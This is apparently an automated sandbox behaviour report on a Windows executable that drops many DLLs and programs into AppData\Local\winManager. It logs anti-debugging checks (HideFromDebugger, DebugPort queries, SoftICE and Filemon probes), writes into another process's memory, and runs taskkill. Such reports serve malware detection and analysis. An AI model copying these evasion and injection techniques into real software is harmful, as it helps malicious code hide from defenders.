Source: C:\Users\user\AppData\Local\winManager\FLServer.exe TID: 988Thread sleep time: -60000s >= -30000s
Source: C:\Users\user\AppData\Local\winManager\FLServer.exe TID: 4648Thread sleep time: -60000s >= -30000s
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Users\user\AppData\Local\winManager\FLServer.exeLast function: Thread delayed
Source: C:\Users\user\AppData\Local\winManager\FLMgrTray.exeThread delayed: delay time: 7200000
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\winManager\node.dllJump to dropped file
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\winManager\api-ms-win-core-string-l1-1-0.dllJump to dropped file
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\winManager\api-ms-win-core-rtlsupport-l1-1-0.dllJump to dropped file
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\winManager\soui-sys-resource.dllJump to dropped file
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\winManager\api-ms-win-core-console-l1-1-0.dllJump to dropped file
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\winManager\api-ms-win-crt-process-l1-1-0.dllJump to dropped file
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\winManager\api-ms-win-core-file-l1-2-0.dllJump to dropped file
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\winManager\api-ms-win-crt-stdio-l1-1-0.dllJump to dropped file
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\winManager\api-ms-win-core-debug-l1-1-0.dllJump to dropped file
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\winManager\render-skia.dllJump to dropped file
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\winManager\leave.exeJump to dropped file
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\winManager\api-ms-win-crt-math-l1-1-0.dllJump to dropped file
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\winManager\api-ms-win-core-errorhandling-l1-1-0.dllJump to dropped file
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\winManager\api-ms-win-core-memory-l1-1-0.dllJump to dropped file
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\winManager\api-ms-win-core-heap-l1-1-0.dllJump to dropped file
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\winManager\api-ms-win-core-processenvironment-l1-1-0.dllJump to dropped file
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\winManager\api-ms-win-core-processthreads-l1-1-0.dllJump to dropped file
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\winManager\api-ms-win-core-localization-l1-2-0.dllJump to dropped file
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\winManager\imgdecoder-png.dllJump to dropped file
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\winManager\utilities.dllJump to dropped file
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\winManager\api-ms-win-core-timezone-l1-1-0.dllJump to dropped file
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\winManager\api-ms-win-core-sysinfo-l1-1-0.dllJump to dropped file
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\winManager\api-ms-win-core-processthreads-l1-1-1.dllJump to dropped file
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\winManager\api-ms-win-crt-private-l1-1-0.dllJump to dropped file
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\winManager\API-MS-Win-core-xstate-l2-1-0.dllJump to dropped file
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\winManager\api-ms-win-core-fibers-l1-1-0.dllJump to dropped file
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\winManager\api-ms-win-core-file-l2-1-0.dllJump to dropped file
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\winManager\api-ms-win-crt-time-l1-1-0.dllJump to dropped file
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\winManager\api-ms-win-crt-environment-l1-1-0.dllJump to dropped file
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\winManager\FLMgrUpdate.exeJump to dropped file
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\winManager\api-ms-win-core-synch-l1-1-0.dllJump to dropped file
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\winManager\resprovider-zip.dllJump to dropped file
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\winManager\api-ms-win-core-datetime-l1-1-0.dllJump to dropped file
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\winManager\api-ms-win-crt-multibyte-l1-1-0.dllJump to dropped file
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\winManager\soui3.dllJump to dropped file
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\winManager\api-ms-win-core-interlocked-l1-1-0.dllJump to dropped file
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\winManager\CrashRpt.dllJump to dropped file
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\winManager\api-ms-win-core-handle-l1-1-0.dllJump to dropped file
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\winManager\imgdecoder-gdip.dllJump to dropped file
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\winManager\api-ms-win-core-libraryloader-l1-1-0.dllJump to dropped file
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\winManager\api-ms-win-crt-conio-l1-1-0.dllJump to dropped file
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\winManager\msvcp120.dllJump to dropped file
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\winManager\api-ms-win-crt-utility-l1-1-0.dllJump to dropped file
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\winManager\msvcr120.dllJump to dropped file
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\winManager\zlibwapi.dllJump to dropped file
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\winManager\concrt140.dllJump to dropped file
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\winManager\api-ms-win-crt-convert-l1-1-0.dllJump to dropped file
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\winManager\api-ms-win-core-profile-l1-1-0.dllJump to dropped file
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\winManager\FLPdfTrans.exeJump to dropped file
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\winManager\api-ms-win-crt-locale-l1-1-0.dllJump to dropped file
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\winManager\api-ms-win-core-util-l1-1-0.dllJump to dropped file
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\winManager\api-ms-win-crt-runtime-l1-1-0.dllJump to dropped file
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\winManager\CrashSender.exeJump to dropped file
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\winManager\api-ms-win-crt-string-l1-1-0.dllJump to dropped file
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\winManager\winLead.exeJump to dropped file
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\winManager\libqpdf.dllJump to dropped file
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\winManager\FLExt.exeJump to dropped file
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\winManager\api-ms-win-core-file-l1-1-0.dllJump to dropped file
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\winManager\api-ms-win-core-console-l1-2-0.dllJump to dropped file
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\winManager\winManager.exeJump to dropped file
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\winManager\api-ms-win-core-synch-l1-2-0.dllJump to dropped file
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\winManager\api-ms-win-crt-filesystem-l1-1-0.dllJump to dropped file
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\winManager\api-ms-win-crt-heap-l1-1-0.dllJump to dropped file
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\winManager\api-ms-win-core-namedpipe-l1-1-0.dllJump to dropped file
Source: C:\Users\user\AppData\Local\winManager\FLMgrTray.exeRegistry key enumerated: More than 150 enums for key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
Source: C:\Users\user\AppData\Local\winManager\FLMgrTray.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e972-e325-11ce-bfc1-08002be10318}\0001 name: DriverDesc
Source: C:\Users\user\AppData\Local\winManager\FLMgrTray.exeFile opened: PhysicalDrive0
Source: C:\Users\user\AppData\Local\winManager\FLMgrTray.exeCode function: GetAdaptersInfo,23_2_0016F500
Source: C:\Users\user\AppData\Local\winManager\FLMgrTray.exeThread delayed: delay time: 60000
Source: C:\Users\user\AppData\Local\winManager\FLMgrTray.exeThread delayed: delay time: 7200000
Source: C:\Users\user\AppData\Local\winManager\FLServer.exeThread delayed: delay time: 30000
Source: C:\Users\user\AppData\Local\winManager\FLServer.exeThread delayed: delay time: 60000
Source: C:\Users\user\AppData\Local\winManager\FLServer.exeThread delayed: delay time: 60000
Source: _____NCM______2_10042231.exe, 00000000.00000003.661438161.0000000001A1C000.00000004.00000020.00020000.00000000.sdmp, _____NCM______2_10042231.exe, 00000000.00000002.731992524.0000000001A1C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWP
Source: _____NCM______2_10042231.exe, 00000000.00000002.732037821.0000000001A7D000.00000004.00000020.00020000.00000000.sdmp, _____NCM______2_10042231.exe, 00000000.00000003.420756858.0000000001A7D000.00000004.00000020.00020000.00000000.sdmp, _____NCM______2_10042231.exe, 00000000.00000003.538371355.0000000001A7D000.00000004.00000020.00020000.00000000.sdmp, _____NCM______2_10042231.exe, 00000000.00000003.528631713.0000000001A7D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWtC
Source: _____NCM______2_10042231.exe, 00000000.00000003.593264592.000000000486C000.00000004.00000020.00020000.00000000.sdmp, _____NCM______2_10042231.exe, 00000000.00000003.575226837.000000000486C000.00000004.00000020.00020000.00000000.sdmp, _____NCM______2_10042231.exe, 00000000.00000003.538128273.000000000486C000.00000004.00000020.00020000.00000000.sdmp, _____NCM______2_10042231.exe, 00000000.00000003.420820800.0000000004872000.00000004.00000020.00020000.00000000.sdmp, _____NCM______2_10042231.exe, 00000000.00000003.600413657.000000000486C000.00000004.00000020.00020000.00000000.sdmp, _____NCM______2_10042231.exe, 00000000.00000003.599905174.000000000486C000.00000004.00000020.00020000.00000000.sdmp, _____NCM______2_10042231.exe, 00000000.00000002.733702466.000000000486C000.00000004.00000020.00020000.00000000.sdmp, _____NCM______2_10042231.exe, 00000000.00000003.528207931.000000000486C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeProcess information queried: ProcessInformationJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeCode function: 0_3_1000B11C FindFirstFileExA,0_3_1000B11C
Source: C:\Users\user\AppData\Local\winManager\FLMgrTray.exeCode function: 23_2_0016CB90 memset,GetModuleFileNameW,PathRemoveFileSpecW,memcpy,_invalid_parameter_noinfo_noreturn,memcpy,FindFirstFileW,_invalid_parameter_noinfo_noreturn,StrCmpIW,StrCmpIW,StrCmpIW,StrCmpIW,FindNextFileW,FindClose,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,23_2_0016CB90
Source: C:\Users\user\AppData\Local\winManager\FLMgrTray.exeCode function: 23_2_00184D00 GetFileAttributesW,GetLastError,FindFirstFileW,FindClose,23_2_00184D00
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeFile Volume queried: C:\ FullSizeInformationJump to behavior

Anti Debugging

barindex
Source: C:\Users\user\AppData\Local\winManager\FLMgrTray.exeThread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\winManager\FLMgrTray.exeThread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\winManager\FLMgrTray.exeThread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\winManager\FLMgrTray.exeThread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\winManager\FLMgrTray.exeThread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\winManager\FLMgrTray.exeThread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\winManager\FLMgrTray.exeThread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\winManager\FLMgrTray.exeThread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\winManager\FLMgrTray.exeThread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\winManager\FLMgrTray.exeThread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\winManager\FLMgrTray.exeThread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\winManager\FLMgrTray.exeThread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\winManager\FLMgrTray.exeThread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\winManager\FLMgrTray.exeThread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\winManager\FLMgrTray.exeThread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\winManager\FLMgrTray.exeThread information set: HideFromDebugger
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeCode function: 0_3_10001580 Spro7,GetModuleHandleW,LoadLibraryW,GetProcAddress,GetProcAddress,GetNativeSystemInfo,GetProcAddress,GetCurrentProcess,0_3_10001580
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeCode function: 0_3_10007DE7 mov eax, dword ptr fs:[00000030h]0_3_10007DE7
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeCode function: 0_2_006BD5B2 mov eax, dword ptr fs:[00000030h]0_2_006BD5B2
Source: C:\Users\user\AppData\Local\winManager\FLMgrTray.exeCode function: 23_2_00173BD0 mov eax, dword ptr fs:[00000030h]23_2_00173BD0
Source: C:\Users\user\AppData\Local\winManager\FLMgrTray.exeCode function: 23_2_00173BD0 mov eax, dword ptr fs:[00000030h]23_2_00173BD0
Source: C:\Users\user\AppData\Local\winManager\FLMgrTray.exeCode function: 23_2_00180F20 mov eax, dword ptr fs:[00000030h]23_2_00180F20
Source: C:\Users\user\AppData\Local\winManager\FLMgrTray.exeProcess queried: DebugPort
Source: C:\Users\user\AppData\Local\winManager\FLMgrTray.exeProcess queried: DebugObjectHandle
Source: C:\Users\user\AppData\Local\winManager\FLMgrTray.exeProcess queried: DebugPort
Source: C:\Users\user\AppData\Local\winManager\FLMgrTray.exeProcess queried: DebugPort
Source: C:\Users\user\AppData\Local\winManager\FLMgrTray.exeProcess queried: DebugObjectHandle
Source: C:\Users\user\AppData\Local\winManager\FLMgrTray.exeProcess queried: DebugPort
Source: C:\Users\user\AppData\Local\winManager\FLMgrTray.exeProcess queried: DebugPort
Source: C:\Users\user\AppData\Local\winManager\FLMgrTray.exeProcess queried: DebugObjectHandle
Source: C:\Users\user\AppData\Local\winManager\FLMgrTray.exeProcess queried: DebugPort
Source: C:\Users\user\AppData\Local\winManager\FLMgrTray.exeProcess queried: DebugPort
Source: C:\Users\user\AppData\Local\winManager\FLMgrTray.exeProcess queried: DebugObjectHandle
Source: C:\Users\user\AppData\Local\winManager\FLMgrTray.exeProcess queried: DebugPort
Source: C:\Users\user\AppData\Local\winManager\FLMgrTray.exeProcess queried: DebugPort
Source: C:\Users\user\AppData\Local\winManager\FLMgrTray.exeProcess queried: DebugObjectHandle
Source: C:\Users\user\AppData\Local\winManager\FLMgrTray.exeProcess queried: DebugPort
Source: C:\Users\user\AppData\Local\winManager\FLMgrTray.exeFile opened: FILEMON701
Source: C:\Users\user\AppData\Local\winManager\FLMgrTray.exeFile opened: FILEVXD
Source: C:\Users\user\AppData\Local\winManager\FLMgrTray.exeFile opened: REGVXD
Source: C:\Users\user\AppData\Local\winManager\FLMgrTray.exeFile opened: NTICE
Source: C:\Users\user\AppData\Local\winManager\FLMgrTray.exeFile opened: REGMON701
Source: C:\Users\user\AppData\Local\winManager\FLMgrTray.exeFile opened: SICE
Source: C:\Users\user\AppData\Local\winManager\FLMgrTray.exeFile opened: SIWVID
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeCode function: 0_3_10006005 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_3_10006005
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeCode function: 0_3_1000BDEA GetProcessHeap,0_3_1000BDEA
Source: C:\Windows\SysWOW64\taskkill.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\SysWOW64\taskkill.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\SysWOW64\taskkill.exeProcess token adjusted: DebugJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeCode function: 0_3_10006005 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_3_10006005
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeCode function: 0_3_10002D32 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_3_10002D32
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeCode function: 0_3_10003294 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_3_10003294
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeCode function: 0_2_006A7A9F IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_006A7A9F
Source: C:\Users\user\AppData\Local\winManager\FLMgrTray.exeCode function: 23_2_00176572 SetUnhandledExceptionFilter,23_2_00176572
Source: C:\Users\user\AppData\Local\winManager\FLMgrTray.exeCode function: 23_2_0017615D SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,23_2_0017615D
Source: C:\Users\user\AppData\Local\winManager\FLMgrTray.exeCode function: 23_2_001763DC IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,23_2_001763DC

HIPS / PFW / Operating System Protection Evasion

barindex
Source: C:\Windows\explorer.exeSection loaded: C:\Windows\System32\vcruntime140.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: C:\Windows\System32\msvcp140.dllJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeMemory written: PID: 6596 base: 2770000 value: B8Jump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeMemory written: PID: 6596 base: 28222D8 value: 00Jump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeMemory written: PID: 6596 base: 28231E8 value: 00Jump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\System32\explorer.exe" /select,"C:\Users\user\Desktop\wyyyyncmwjzh.rarJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im winManager.exeJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im FLMgrUpdate.exeJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im FLMgrTray.exeJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeQueries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeQueries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeQueries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeQueries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeQueries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeQueries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeQueries volume information: C:\Windows\Fonts\consola.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeQueries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeQueries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeQueries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeQueries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeQueries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeQueries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeQueries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeQueries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeQueries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformationJump to behavior
